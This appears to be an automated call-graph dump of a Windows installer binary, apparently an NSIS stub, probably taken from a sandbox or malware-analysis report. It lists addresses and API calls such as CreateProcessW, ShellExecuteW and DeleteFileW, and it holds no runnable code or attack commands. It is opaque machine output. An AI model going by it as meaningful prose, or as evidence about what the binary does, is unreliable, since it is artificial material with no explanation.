3481->3483 3482 403a47 3482->3483 3486 403ab1 3482->3486 3487 405d06 CharNextW 3482->3487 3639 403859 3483->3639 3485->3472 3485->3478 3493 4039d8 3485->3493 3582 40592c 3486->3582 3499 403a5e 3487->3499 3490 403ac1 3667 4060e7 3490->3667 3491 403ae1 3646 405ca0 3491->3646 3492 403bce 3495 403c51 3492->3495 3497 4062fc 3 API calls 3492->3497 3650 406009 lstrcpynW 3493->3650 3501 403bdd 3497->3501 3502 403af7 lstrcatW lstrcmpiW 3499->3502 3503 403a89 3499->3503 3504 4062fc 3 API calls 3501->3504 3502->3483 3506 403b13 CreateDirectoryW SetCurrentDirectoryW 3502->3506 3651 40677e 3503->3651 3507 403be6 3504->3507 3509 403b36 3506->3509 3510 403b2b 3506->3510 3511 4062fc 3 API calls 3507->3511 3681 406009 lstrcpynW 3509->3681 3680 406009 lstrcpynW 3510->3680 3515 403bef 3511->3515 3514 403b44 3682 406009 lstrcpynW 3514->3682 3518 403c3d ExitWindowsEx 3515->3518 3523 403bfd GetCurrentProcess 3515->3523 3518->3495 3520 403c4a 3518->3520 3519 403aa6 3666 406009 lstrcpynW 3519->3666 3709 40141d 3520->3709 3526 403c0d 3523->3526 3526->3518 3527 403b79 CopyFileW 3529 403b53 3527->3529 3528 403bc2 3530 406c68 42 API calls 3528->3530 3529->3528 3533 406805 18 API calls 3529->3533 3535 403bad CloseHandle 3529->3535 3683 406805 3529->3683 3701 406c68 3529->3701 3706 405c3f CreateProcessW 3529->3706 3532 403bc9 3530->3532 3532->3483 3533->3529 3535->3529 3537 406314 LoadLibraryA 3536->3537 3538 40631f GetProcAddress 3536->3538 3537->3538 3539 4038c6 SHGetFileInfoW 3537->3539 3538->3539 3540 406009 lstrcpynW 3539->3540 3540->3466 3541->3468 3543 405d0c 3542->3543 3544 40392a CharNextW 3543->3544 3545 405d13 CharNextW 3543->3545 3544->3485 3545->3543 3712 406038 3546->3712 3548 4037e2 3548->3475 3549 4037d8 3549->3548 3721 406722 lstrlenW CharPrevW 3549->3721 3728 405e50 GetFileAttributesW CreateFileW 3554->3728 3556 4035c7 3577 4035d7 3556->3577 3729 406009 lstrcpynW 3556->3729 3558 4035ed 3730 406751 lstrlenW 3558->3730 3562 4035fe GetFileSize 3563 4036fa 3562->3563 3576 403615 3562->3576 3737 4032d2 3563->3737 3565 403703 3567 40373f GlobalAlloc 3565->3567 3565->3577 3771 403368 SetFilePointer 3565->3771 3748 403368 SetFilePointer 3567->3748 3569 4037bd 3573 4032d2 6 API calls 3569->3573 3571 40375a 3749 40337f 3571->3749 3572 403720 3575 403336 ReadFile 3572->3575 3573->3577 3578 40372b 3575->3578 3576->3563 3576->3569 3576->3577 3579 4032d2 6 API calls 3576->3579 3735 403336 ReadFile 3576->3735 3577->3482 3578->3567 3578->3577 3579->3576 3580 403766 3580->3577 3580->3580 3581 403794 SetFilePointer 3580->3581 3581->3577 3583 4062fc 3 API calls 3582->3583 3584 405940 3583->3584 3585 405946 3584->3585 3586 405958 3584->3586 3812 405f51 wsprintfW 3585->3812 3813 405ed3 RegOpenKeyExW 3586->3813 3590 4059a8 lstrcatW 3592 405956 3590->3592 3591 405ed3 3 API calls 3591->3590 3795 403e95 3592->3795 3595 40677e 18 API calls 3596 4059da 3595->3596 3597 405a70 3596->3597 3599 405ed3 3 API calls 3596->3599 3598 40677e 18 API calls 3597->3598 3600 405a76 3598->3600 3601 405a0c 3599->3601 3602 405a86 3600->3602 3603 406805 18 API calls 3600->3603 3601->3597 3607 405a2f lstrlenW 3601->3607 3613 405d06 CharNextW 3601->3613 3604 405aa6 LoadImageW 3602->3604 3819 403e74 3602->3819 3603->3602 3605 405ad1 RegisterClassW 3604->3605 3606 405b66 3604->3606 3611 405b19 SystemParametersInfoW CreateWindowExW 3605->3611 3636 405b70 3605->3636 3612 40141d 80 API calls 3606->3612 3608 405a63 3607->3608 3609 405a3d lstrcmpiW 3607->3609 3616 406722 3 API calls 3608->3616 3609->3608 3614 405a4d GetFileAttributesW 3609->3614 3611->3606 3617 405b6c 3612->3617 3618 405a2a 3613->3618 3619 405a59 3614->3619 3615 405a9c 3615->3604 3620 405a69 3616->3620 3623 403e95 19 API calls 3617->3623 3617->3636 3618->3607 3619->3608 3621 406751 2 API calls 3619->3621 3818 406009 lstrcpynW 3620->3818 3621->3608 3624 405b7d 3623->3624 3625 405b89 ShowWindow LoadLibraryW 3624->3625 3626 405c0c 3624->3626 3628 405ba8 LoadLibraryW 3625->3628 3629 405baf GetClassInfoW 3625->3629 3804 405047 OleInitialize 3626->3804 3628->3629 3630 405bc3 GetClassInfoW RegisterClassW 3629->3630 3631 405bd9 DialogBoxParamW 3629->3631 3630->3631 3633 40141d 80 API calls 3631->3633 3632 405c12 3634 405c16 3632->3634 3635 405c2e 3632->3635 3633->3636 3634->3636 3638 40141d 80 API calls 3634->3638 3637 40141d 80 API calls 3635->3637 3636->3490 3637->3636 3638->3636 3640 403871 3639->3640 3641 403863 CloseHandle 3639->3641 3964 403c83 3640->3964 3641->3640 3647 405cb5 3646->3647 3648 403aef ExitProcess 3647->3648 3649 405ccb MessageBoxIndirectW 3647->3649 3649->3648 3650->3473 4021 406009 lstrcpynW 3651->4021 3653 40678f 3654 405d59 4 API calls 3653->3654 3655 406795 3654->3655 3656 406038 5 API calls 3655->3656 3663 403a97 3655->3663 3662 4067a5 3656->3662 3657 4067dd lstrlenW 3658 4067e4 3657->3658 3657->3662 3659 406722 3 API calls 3658->3659 3661 4067ea GetFileAttributesW 3659->3661 3660 4062d5 2 API calls 3660->3662 3661->3663 3662->3657 3662->3660 3662->3663 3664 406751 2 API calls 3662->3664 3663->3483 3665 406009 lstrcpynW 3663->3665 3664->3657 3665->3519 3666->3486 3668 406110 3667->3668 3669 4060f3 3667->3669 3671 406187 3668->3671 3672 40612d 3668->3672 3675 406104 3668->3675 3670 4060fd CloseHandle 3669->3670 3669->3675 3670->3675 3673 406190 lstrcatW lstrlenW WriteFile 3671->3673 3671->3675 3672->3673 3674 406136 GetFileAttributesW 3672->3674 3673->3675 4022 405e50 GetFileAttributesW CreateFileW 3674->4022 3675->3483 3677 406152 3677->3675 3678 406162 WriteFile 3677->3678 3679 40617c SetFilePointer 3677->3679 3678->3679 3679->3671 3680->3509 3681->3514 3682->3529 3698 406812 3683->3698 3684 406a7f 3685 403b6c DeleteFileW 3684->3685 4025 406009 lstrcpynW 3684->4025 3685->3527 3685->3529 3687 4068d3 GetVersion 3687->3698 3688 406a46 lstrlenW 3688->3698 3689 406805 10 API calls 3689->3688 3692 405ed3 3 API calls 3692->3698 3693 406952 GetSystemDirectoryW 3693->3698 3694 406965 GetWindowsDirectoryW 3694->3698 3695 406038 5 API calls 3695->3698 3696 406805 10 API calls 3696->3698 3697 4069df lstrcatW 3697->3698 3698->3684 3698->3687 3698->3688 3698->3689 3698->3692 3698->3693 3698->3694 3698->3695 3698->3696 3698->3697 3699 406999 SHGetSpecialFolderLocation 3698->3699 4023 405f51 wsprintfW 3698->4023 4024 406009 lstrcpynW 3698->4024 3699->3698 3700 4069b1 SHGetPathFromIDListW CoTaskMemFree 3699->3700 3700->3698 3702 4062fc 3 API calls 3701->3702 3703 406c6f 3702->3703 3705 406c90 3703->3705 4026 406a99 lstrcpyW 3703->4026 3705->3529 3707 405c7a 3706->3707 3708 405c6e CloseHandle 3706->3708 3707->3529 3708->3707 3710 40139d 80 API calls 3709->3710 3711 401432 3710->3711 3711->3495 3718 406045 3712->3718 3713 4060bb 3714 4060c1 CharPrevW 3713->3714 3716 4060e1 3713->3716 3714->3713 3715 4060ae CharNextW 3715->3713 3715->3718 3716->3549 3717 405d06 CharNextW 3717->3718 3718->3713 3718->3715 3718->3717 3719 40609a CharNextW 3718->3719 3720 4060a9 CharNextW 3718->3720 3719->3718 3720->3715 3722 4037ea CreateDirectoryW 3721->3722 3723 40673f lstrcatW 3721->3723 3724 405e7f 3722->3724 3723->3722 3725 405e8c GetTickCount GetTempFileNameW 3724->3725 3726 405ec2 3725->3726 3727 4037fe 3725->3727 3726->3725 3726->3727 3727->3475 3728->3556 3729->3558 3731 406760 3730->3731 3732 4035f3 3731->3732 3733 406766 CharPrevW 3731->3733 3734 406009 lstrcpynW 3732->3734 3733->3731 3733->3732 3734->3562 3736 403357 3735->3736 3736->3576 3738 4032f3 3737->3738 3739 4032db 3737->3739 3742 403303 GetTickCount 3738->3742 3743 4032fb 3738->3743 3740 4032e4 DestroyWindow 3739->3740 3741 4032eb 3739->3741 3740->3741 3741->3565 3745 403311 CreateDialogParamW ShowWindow 3742->3745 3746 403334 3742->3746 3772 406332 3743->3772 3745->3746 3746->3565 3748->3571 3751 403398 3749->3751 3750 4033c3 3753 403336 ReadFile 3750->3753 3751->3750 3794 403368 SetFilePointer 3751->3794 3754 4033ce 3753->3754 3755 4033e7 GetTickCount 3754->3755 3756 403518 3754->3756 3758 4033d2 3754->3758 3768 4033fa 3755->3768 3757 40351c 3756->3757 3762 403540 3756->3762 3759 403336 ReadFile 3757->3759 3758->3580 3759->3758 3760 403336 ReadFile 3760->3762 3761 403336 ReadFile 3761->3768 3762->3758 3762->3760 3763 40355f WriteFile 3762->3763 3763->3758 3764 403574 3763->3764 3764->3758 3764->3762 3766 40345c GetTickCount 3766->3768 3767 403485 MulDiv wsprintfW 3783 404f72 3767->3783 3768->3758 3768->3761 3768->3766 3768->3767 3770 4034c9 WriteFile 3768->3770 3776 407312 3768->3776 3770->3758 3770->3768 3771->3572 3773 40634f PeekMessageW 3772->3773 3774 406345 DispatchMessageW 3773->3774 3775 403301 3773->3775 3774->3773 3775->3565 3777 407332 3776->3777 3778 40733a 3776->3778 3777->3768 3778->3777 3779 4073c2 GlobalFree 3778->3779 3780 4073cb GlobalAlloc 3778->3780 3781 407443 GlobalAlloc 3778->3781 3782 40743a GlobalFree 3778->3782 3779->3780 3780->3777 3780->3778 3781->3777 3781->3778 3782->3781 3784 404f8b 3783->3784 3793 40502f 3783->3793 3785 404fa9 lstrlenW 3784->3785 3786 406805 18 API calls 3784->3786 3787 404fd2 3785->3787 3788 404fb7 lstrlenW 3785->3788 3786->3785 3790 404fe5 3787->3790 3791 404fd8 SetWindowTextW 3787->3791 3789 404fc9 lstrcatW 3788->3789 3788->3793 3789->3787 3792 404feb SendMessageW SendMessageW SendMessageW 3790->3792 3790->3793 3791->3790 3792->3793 3793->3768 3794->3750 3796 403ea9 3795->3796 3824 405f51 wsprintfW 3796->3824 3798 403f1d 3799 406805 18 API calls 3798->3799 3800 403f29 SetWindowTextW 3799->3800 3802 403f44 3800->3802 3801 403f5f 3801->3595 3802->3801 3803 406805 18 API calls 3802->3803 3803->3802 3825 403daf 3804->3825 3806 40506a 3809 4062a3 11 API calls 3806->3809 3811 405095 3806->3811 3828 40139d 3806->3828 3807 403daf SendMessageW 3808 4050a5 OleUninitialize 3807->3808 3808->3632 3809->3806 3811->3807 3812->3592 3814 405f07 RegQueryValueExW 3813->3814 3815 405989 3813->3815 3816 405f29 RegCloseKey 3814->3816 3815->3590 3815->3591 3816->3815 3818->3597 3963 406009 lstrcpynW 3819->3963 3821 403e88 3822 406722 3 API calls 3821->3822 3823 403e8e lstrcatW 3822->3823 3823->3615 3824->3798 3826 403dc7 3825->3826 3827 403db8 SendMessageW 3825->3827 3826->3806 3827->3826 3831 4013a4 3828->3831 3829 401410 3829->3806 3831->3829 3832 4013dd MulDiv SendMessageW 3831->3832 3833 4015a0 3831->3833 3832->3831 3834 4015fa 3833->3834 3913 40160c 3833->3913 3835 401601 3834->3835 3836 401742 3834->3836 3837 401962 3834->3837 3838 4019ca 3834->3838 3839 40176e 3834->3839 3840 401650 3834->3840 3841 4017b1 3834->3841 3842 401672 3834->3842 3843 401693 3834->3843 3844 401616 3834->3844 3845 4016d6 3834->3845 3846 401736 3834->3846 3847 401897 3834->3847 3848 4018db 3834->3848 3849 40163c 3834->3849 3850 4016bd 3834->3850 3834->3913 3863 4062a3 11 API calls 3835->3863 3855 401751 ShowWindow 3836->3855 3856 401758 3836->3856 3860 40145c 18 API calls 3837->3860 3853 40145c 18 API calls 3838->3853 3857 40145c 18 API calls 3839->3857 3880 4062a3 11 API calls 3840->3880 3946 40145c 3841->3946 3858 40145c 18 API calls 3842->3858 3940 401446 3843->3940 3852 40145c 18 API calls 3844->3852 3869 401446 18 API calls 3845->3869 3845->3913 3846->3913 3962 405f51 wsprintfW 3846->3962 3859 40145c 18 API calls 3847->3859 3864 40145c 18 API calls 3848->3864 3854 401647 PostQuitMessage 3849->3854 3849->3913 3851 4062a3 11 API calls 3850->3851 3866 4016c7 SetForegroundWindow 3851->3866 3867 40161c 3852->3867 3868 4019d1 SearchPathW 3853->3868 3854->3913 3855->3856 3870 401765 ShowWindow 3856->3870 3856->3913 3871 401775 3857->3871 3872 401678 3858->3872 3873 40189d 3859->3873 3874 401968 GetFullPathNameW 3860->3874 3863->3913 3865 4018e2 3864->3865 3877 40145c 18 API calls 3865->3877 3866->3913 3878 4062a3 11 API calls 3867->3878 3868->3913 3869->3913 3870->3913 3881 4062a3 11 API calls 3871->3881 3882 4062a3 11 API calls 3872->3882 3958 4062d5 FindFirstFileW 3873->3958 3884 40197f 3874->3884 3926 4019a1 3874->3926 3876 40169a 3943 4062a3 lstrlenW wvsprintfW 3876->3943 3887 4018eb 3877->3887 3888 401627 3878->3888 3889 401664 3880->3889 3890 401785 SetFileAttributesW 3881->3890 3891 401683 3882->3891 3908 4062d5 2 API calls 3884->3908 3884->3926 3885 4062a3 11 API calls 3893 4017c9 3885->3893 3896 40145c 18 API calls 3887->3896 3897 404f72 25 API calls 3888->3897 3898 40139d 65 API calls 3889->3898 3899 40179a 3890->3899 3890->3913 3906 404f72 25 API calls 3891->3906 3951 405d59 CharNextW CharNextW 3893->3951 3895 4019b8 GetShortPathNameW 3895->3913 3904 4018f5 3896->3904 3897->3913 3898->3913 3905 4062a3 11 API calls 3899->3905 3900 4018c2 3909 4062a3 11 API calls 3900->3909 3901 4018a9 3907 4062a3 11 API calls 3901->3907 3911 4062a3 11 API calls 3904->3911 3905->3913 3906->3913 3907->3913 3912 401991 3908->3912 3909->3913 3910 4017d4 3914 401864 3910->3914 3917 405d06 CharNextW 3910->3917 3935 4062a3 11 API calls 3910->3935 3915 401902 MoveFileW 3911->3915 3912->3926 3961 406009 lstrcpynW 3912->3961 3913->3831 3914->3891 3916 40186e 3914->3916 3918 401912 3915->3918 3919 40191e 3915->3919 3920 404f72 25 API calls 3916->3920 3922 4017e6 CreateDirectoryW 3917->3922 3918->3891 3924 401942 3919->3924 3929 4062d5 2 API calls 3919->3929 3925 401875 3920->3925 3922->3910 3923 4017fe GetLastError 3922->3923 3927 401827 GetFileAttributesW 3923->3927 3928 40180b GetLastError 3923->3928 3934 4062a3 11 API calls 3924->3934 3957 406009 lstrcpynW 3925->3957 3926->3895 3926->3913 3927->3910 3931 4062a3 11 API calls 3928->3931 3932 401929 3929->3932 3931->3910 3932->3924 3937 406c68 42 API calls 3932->3937 3933 401882 SetCurrentDirectoryW 3933->3913 3936 40195c 3934->3936 3935->3910 3936->3913 3938 401936 3937->3938 3939 404f72 25 API calls 3938->3939 3939->3924 3941 406805 18 API calls 3940->3941 3942 401455 3941->3942 3942->3876 3944 4060e7 9 API calls 3943->3944 3945 4016a7 Sleep 3944->3945 3945->3913 3947 406805 18 API calls 3946->3947 3948 401488 3947->3948 3949 401497 3948->3949 3950 406038 5 API calls 3948->3950 3949->3885 3950->3949 3952 405d76 3951->3952 3953 405d88 3951->3953 3952->3953 3954 405d83 CharNextW 3952->3954 3955 405dac 3953->3955 3956 405d06 CharNextW 3953->3956 3954->3955 3955->3910 3956->3953 3957->3933 3959 4018a5 3958->3959 3960 4062eb FindClose 3958->3960 3959->3900 3959->3901 3960->3959 3961->3926 3962->3913 3963->3821 3965 403c91 3964->3965 3966 403876 3965->3966 3967 403c96 FreeLibrary GlobalFree 3965->3967 3968 406c9b 3966->3968 3967->3966 3967->3967 3969 40677e 18 API calls 3968->3969 3970 406cae 3969->3970 3971 406cb7 DeleteFileW 3970->3971 3972 406cce 3970->3972 4012 403882 CoUninitialize 3971->4012 3973 406e4b 3972->3973 4016 406009 lstrcpynW 3972->4016 3979 4062d5 2 API calls 3973->3979 4001 406e58 3973->4001 3973->4012 3975 406cf9 3976 406d03 lstrcatW 3975->3976 3977 406d0d 3975->3977 3978 406d13 3976->3978 3980 406751 2 API calls 3977->3980 3982 406d23 lstrcatW 3978->3982 3983 406d19 3978->3983 3981 406e64 3979->3981 3980->3978 3986 406722 3 API calls 3981->3986 3981->4012 3985 406d2b lstrlenW FindFirstFileW 3982->3985 3983->3982 3983->3985 3984 4062a3 11 API calls 3984->4012 3987 406e3b 3985->3987 3991 406d52 3985->3991 3988 406e6e 3986->3988 3987->3973 3990 4062a3 11 API calls 3988->3990 3989 405d06 CharNextW 3989->3991 3992 406e79 3990->3992 3991->3989 3995 406e18 FindNextFileW 3991->3995 4004 406c9b 72 API calls 3991->4004 4011 404f72 25 API calls 3991->4011 4013 4062a3 11 API calls 3991->4013 4014 404f72 25 API calls 3991->4014 4015 406c68 42 API calls 3991->4015 4017 406009 lstrcpynW 3991->4017 4018 405e30 GetFileAttributesW 3991->4018 3993 405e30 2 API calls 3992->3993 3994 406e81 RemoveDirectoryW 3993->3994 3998 406ec4 3994->3998 3999 406e8d 3994->3999 3995->3991 3997 406e30 FindClose 3995->3997 3997->3987 4000 404f72 25 API calls 3998->4000 3999->4001 4002 406e93 3999->4002 4000->4012 4001->3984 4003 4062a3 11 API calls 4002->4003 4005 406e9d 4003->4005 4004->3991 4007 404f72 25 API calls 4005->4007 4009 406ea7 4007->4009 4010 406c68 42 API calls 4009->4010 4010->4012 4011->3995 4012->3491 4012->3492 4013->3991 4014->3991 4015->3991 4016->3975 4017->3991 4019 405e4d DeleteFileW 4018->4019 4020 405e3f SetFileAttributesW 4018->4020 4019->3991 4020->4019 4021->3653 4022->3677 4023->3698 4024->3698 4025->3685 4027 406ae7 GetShortPathNameW 4026->4027 4028 406abe 4026->4028 4029 406b00 4027->4029 4030 406c62 4027->4030 4052 405e50 GetFileAttributesW CreateFileW 4028->4052 4029->4030 4032 406b08 WideCharToMultiByte 4029->4032 4030->3705 4032->4030 4034 406b25 WideCharToMultiByte 4032->4034 4033 406ac7 CloseHandle GetShortPathNameW 4033->4030 4035 406adf 4033->4035 4034->4030 4036 406b3d wsprintfA 4034->4036 4035->4027 4035->4030 4037 406805 18 API calls 4036->4037 4038 406b69 4037->4038 4053 405e50 GetFileAttributesW CreateFileW 4038->4053 4040 406b76 4040->4030 4041 406b83 GetFileSize GlobalAlloc 4040->4041 4042 406ba4 ReadFile 4041->4042 4043 406c58 CloseHandle 4041->4043 4042->4043 4044 406bbe 4042->4044 4043->4030 4044->4043 4054 405db6 lstrlenA 4044->4054 4047 406bd7 lstrcpyA 4050 406bf9 4047->4050 4048 406beb 4049 405db6 4 API calls 4048->4049 4049->4050 4051 406c30 SetFilePointer WriteFile GlobalFree 4050->4051 4051->4043 4052->4033 4053->4040 4055 405df7 lstrlenA 4054->4055 4056 405dd0 lstrcmpiA 4055->4056 4057 405dff 4055->4057 4056->4057 4058 405dee CharNextA 4056->4058 4057->4047 4057->4048 4058->4055 4939 402a84 4940 401553 19 API calls 4939->4940 4941 402a8e 4940->4941 4942 401446 18 API calls 4941->4942 4943 402a98 4942->4943 4944 401a13 4943->4944 4945 402ab2 RegEnumKeyW 4943->4945 4946 402abe RegEnumValueW 4943->4946 4947 402a7e 4945->4947 4946->4944 4946->4947 4947->4944 4948 4029e4 RegCloseKey 4947->4948 4948->4944 4949 402c8a 4950 402ca2 4949->4950 4951 402c8f 4949->4951 4953 40145c 18 API calls 4950->4953 4952 401446 18 API calls 4951->4952 4955 402c97 4952->4955 4954 402ca9 lstrlenW 4953->4954 4954->4955 4956 402ccb WriteFile 4955->4956 4957 401a13 4955->4957 4956->4957 4958 40400d 4959 40406a 4958->4959 4960 40401a lstrcpynA lstrlenA 4958->4960 4960->4959 4961 40404b 4960->4961 4961->4959 4962 404057 GlobalFree 4961->4962 4962->4959 4963 401d8e 4964 40145c 18 API calls 4963->4964 4965 401d95 ExpandEnvironmentStringsW 4964->4965 4966 401da8 4965->4966 4968 401db9 4965->4968 4967 401dad lstrcmpW 4966->4967 4966->4968 4967->4968 4969 401e0f 4970 401446 18 API calls 4969->4970 4971 401e17 4970->4971 4972 401446 18 API calls 4971->4972 4973 401e21 4972->4973 4974 4030e3 4973->4974 4976 405f51 wsprintfW 4973->4976 4976->4974 4977 402392 4978 40145c 18 API calls 4977->4978 4979 402399 4978->4979 4982 4071f8 4979->4982 4983 406ed2 25 API calls 4982->4983 4984 407218 4983->4984 4985 407222 lstrcpynW lstrcmpW 4984->4985 4986 4023a7 4984->4986 4987 407254 4985->4987 4988 40725a lstrcpynW 4985->4988 4987->4988 4988->4986 4059 402713 4074 406009 lstrcpynW 4059->4074 4061 40272c 4075 406009 lstrcpynW 4061->4075 4063 402738 4064 40145c 18 API calls 4063->4064 4066 402743 4063->4066 4064->4066 4065 402752 4068 40145c 18 API calls 4065->4068 4070 402761 4065->4070 4066->4065 4067 40145c 18 API calls 4066->4067 4067->4065 4068->4070 4069 40145c 18 API calls 4071 40276b 4069->4071 4070->4069 4072 4062a3 11 API calls 4071->4072 4073 40277f WritePrivateProfileStringW 4072->4073 4074->4061 4075->4063 4989 402797 4990 40145c 18 API calls 4989->4990 4991 4027ae 4990->4991 4992 40145c 18 API calls 4991->4992 4993 4027b7 4992->4993 4994 40145c 18 API calls 4993->4994 4995 4027c0 GetPrivateProfileStringW lstrcmpW 4994->4995 4996 402e18 4997 40145c 18 API calls 4996->4997 4998 402e1f FindFirstFileW 4997->4998 4999 402e32 4998->4999 5004 405f51 wsprintfW 4999->5004 5001 402e43 5005 406009 lstrcpynW 5001->5005 5003 402e50 5004->5001 5005->5003 5006 401e9a 5007 40145c 18 API calls 5006->5007 5008 401ea1 5007->5008 5009 401446 18 API calls 5008->5009 5010 401eab wsprintfW 5009->5010 4286 401a1f 4287 40145c 18 API calls 4286->4287 4288 401a26 4287->4288 4289 4062a3 11 API calls 4288->4289 4290 401a49 4289->4290 4291 401a64 4290->4291 4292 401a5c 4290->4292 4340 406009 lstrcpynW 4291->4340 4339 406009 lstrcpynW 4292->4339 4295 401a62 4299 406038 5 API calls 4295->4299 4296 401a6f 4297 406722 3 API calls 4296->4297 4298 401a75 lstrcatW 4297->4298 4298->4295 4301 401a81 4299->4301 4300 4062d5 2 API calls 4300->4301 4301->4300 4302 405e30 2 API calls 4301->4302 4304 401a98 CompareFileTime 4301->4304 4305 401ba9 4301->4305 4309 4062a3 11 API calls 4301->4309 4313 406009 lstrcpynW 4301->4313 4319 406805 18 API calls 4301->4319 4326 405ca0 MessageBoxIndirectW 4301->4326 4330 401b50 4301->4330 4337 401b5d 4301->4337 4338 405e50 GetFileAttributesW CreateFileW 4301->4338 4302->4301 4304->4301 4306 404f72 25 API calls 4305->4306 4308 401bb3 4306->4308 4307 404f72 25 API calls 4310 401b70 4307->4310 4311 40337f 37 API calls 4308->4311 4309->4301 4314 4062a3 11 API calls 4310->4314 4312 401bc6 4311->4312 4315 4062a3 11 API calls 4312->4315 4313->4301 4321 401b8b 4314->4321 4316 401bda 4315->4316 4317 401be9 SetFileTime 4316->4317 4318 401bf8 CloseHandle 4316->4318 4317->4318 4320 401c09 4318->4320 4318->4321 4319->4301 4322 401c21 4320->4322 4323 401c0e 4320->4323 4325 406805 18 API calls 4322->4325 4324 406805 18 API calls 4323->4324 4327 401c16 lstrcatW 4324->4327 4328 401c29 4325->4328 4326->4301 4327->4328 4329 4062a3 11 API calls 4328->4329 4331 401c34 4329->4331 4332 401b93 4330->4332 4333 401b53 4330->4333 4334 405ca0 MessageBoxIndirectW 4331->4334 4335 4062a3 11 API calls 4332->4335 4336 4062a3 11 API calls 4333->4336 4334->4321 4335->4321 4336->4337 4337->4307 4338->4301 4339->4295 4340->4296 5011 40209f GetDlgItem GetClientRect 5012 40145c 18 API calls 5011->5012 5013 4020cf LoadImageW SendMessageW 5012->5013 5014 4030e3 5013->5014 5015 4020ed DeleteObject 5013->5015 5015->5014 5016 402b9f 5017 401446 18 API calls 5016->5017 5022 402ba7 5017->5022 5018 402c4a 5019 402bdf ReadFile 5021 402c3d 5019->5021 5019->5022 5020 401446 18 API calls 5020->5021 5021->5018 5021->5020 5028 402d17 ReadFile 5021->5028 5022->5018 5022->5019 5022->5021 5023 402c06 MultiByteToWideChar 5022->5023 5024 402c3f 5022->5024 5026 402c4f 5022->5026 5023->5022 5023->5026 5029 405f51 wsprintfW 5024->5029 5026->5021 5027 402c6b SetFilePointer 5026->5027 5027->5021 5028->5021 5029->5018 5030 402b23 GlobalAlloc 5031 402b39 5030->5031 5032 402b4b 5030->5032 5033 401446 18 API calls 5031->5033 5034 40145c 18 API calls 5032->5034 5035 402b41 5033->5035 5036 402b52 WideCharToMultiByte lstrlenA 5034->5036 5037 402b93 5035->5037 5038 402b84 WriteFile 5035->5038 5036->5035 5038->5037 5039 402384 GlobalFree 5038->5039 5039->5037 5041 4044a5 5042 404512 5041->5042 5043 4044df 5041->5043 5045 40451f GetDlgItem GetAsyncKeyState 5042->5045 5052 4045b1 5042->5052 5109 405c84 GetDlgItemTextW 5043->5109 5048 40453e GetDlgItem 5045->5048 5055 40455c 5045->5055 5046 4044ea 5049 406038 5 API calls 5046->5049 5047 40469d 5107 404833 5047->5107 5111 405c84 GetDlgItemTextW 5047->5111 5050 403d3f 19 API calls 5048->5050 5051 4044f0 5049->5051 5054 404551 ShowWindow 5050->5054 5057 403e74 5 API calls 5051->5057 5052->5047 5058 406805 18 API calls 5052->5058 5052->5107 5054->5055 5060 404579 SetWindowTextW 5055->5060 5065 405d59 4 API calls 5055->5065 5056 403dca 8 API calls 5061 404847 5056->5061 5062 4044f5 GetDlgItem 5057->5062 5063 40462f SHBrowseForFolderW 5058->5063 5059 4046c9 5064 40677e 18 API calls 5059->5064 5066 403d3f 19 API calls 5060->5066 5067 404503 IsDlgButtonChecked 5062->5067 5062->5107 5063->5047 5068 404647 CoTaskMemFree 5063->5068 5069 4046cf 5064->5069 5070 40456f 5065->5070 5071 404597 5066->5071 5067->5042 5072 406722 3 API calls 5068->5072 5112 406009 lstrcpynW 5069->5112 5070->5060 5076 406722 3 API calls 5070->5076 5073 403d3f 19 API calls 5071->5073 5074 404654 5072->5074 5077 4045a2 5073->5077 5078 40468b SetDlgItemTextW 5074->5078 5083 406805 18 API calls 5074->5083 5076->5060 5110 403d98 SendMessageW 5077->5110 5078->5047 5079 4046e6 5081 4062fc 3 API calls 5079->5081 5090 4046ee 5081->5090 5082 4045aa 5086 4062fc 3 API calls 5082->5086 5084 404673 lstrcmpiW 5083->5084 5084->5078 5087 404684 lstrcatW 5084->5087 5085 404730 5113 406009 lstrcpynW 5085->5113 5086->5052 5087->5078 5089 404739 5091 405d59 4 API calls 5089->5091 5090->5085 5095 406751 2 API calls 5090->5095 5096 404785 5090->5096 5092 40473f GetDiskFreeSpaceW 5091->5092 5094 404763 MulDiv 5092->5094 5092->5096 5094->5096 5095->5090 5098 4047e2 5096->5098 5099 4043ad 21 API calls 5096->5099 5097 404805 5114 403d85 KiUserCallbackDispatcher 5097->5114 5098->5097 5100 40141d 80 API calls 5098->5100 5101 4047d3 5099->5101 5100->5097 5103 4047e4 SetDlgItemTextW 5101->5103 5104 4047d8 5101->5104 5103->5098 5105 4043ad 21 API calls 5104->5105 5105->5098 5106 404821 5106->5107 5115 403d61 5106->5115 5107->5056 5109->5046 5110->5082 5111->5059 5112->5079 5113->5089 5114->5106 5116 403d74 SendMessageW 5115->5116 5117 403d6f 5115->5117 5116->5107 5117->5116 5118 402da5 5119 4030e3 5118->5119 5120 402dac 5118->5120 5121 401446 18 API calls 5120->5121 5122 402db8 5121->5122 5123 402dbf SetFilePointer 5122->5123 5123->5119 5124 402dcf 5123->5124 5124->5119 5126 405f51 wsprintfW 5124->5126 5126->5119 5127 4030a9 SendMessageW 5128 4030c2 InvalidateRect 5127->5128 5129 4030e3 5127->5129 5128->5129 5130 401cb2 5131 40145c 18 API calls 5130->5131 5132 401c54 5131->5132 5133 4062a3 11 API calls 5132->5133 5136 401c64 5132->5136 5134 401c59 5133->5134 5135 406c9b 81 API calls 5134->5135 5135->5136 4086 4021b5 4087 40145c 18 API calls 4086->4087 4088 4021bb 4087->4088 4089 40145c 18 API calls 4088->4089 4090 4021c4 4089->4090 4091 40145c 18 API calls 4090->4091 4092 4021cd 4091->4092 4093 40145c 18 API calls 4092->4093 4094 4021d6 4093->4094 4095 404f72 25 API calls 4094->4095 4096 4021e2 ShellExecuteW 4095->4096 4097 40221b 4096->4097 4098 40220d 4096->4098 4100 4062a3 11 API calls 4097->4100 4099 4062a3 11 API calls 4098->4099 4099->4097 4101 402230 4100->4101 5144 402238 5145 40145c 18 API calls 5144->5145 5146 40223e 5145->5146 5147 4062a3 11 API calls 5146->5147 5148 40224b 5147->5148 5149 404f72 25 API calls 5148->5149 5150 402255 5149->5150 5151 405c3f 2 API calls 5150->5151 5152 40225b 5151->5152 5153 4062a3 11 API calls 5152->5153 5156 4022ac CloseHandle 5152->5156 5159 40226d 5153->5159 5155 4030e3 5156->5155 5157 402283 WaitForSingleObject 5158 402291 GetExitCodeProcess 5157->5158 5157->5159 5158->5156 5161 4022a3 5158->5161 5159->5156 5159->5157 5160 406332 2 API calls 5159->5160 5160->5157 5163 405f51 wsprintfW 5161->5163 5163->5156 5164 4040b8 5165 4040d3 5164->5165 5173 404201 5164->5173 5169 40410e 5165->5169 5195 403fca WideCharToMultiByte 5165->5195 5166 40426c 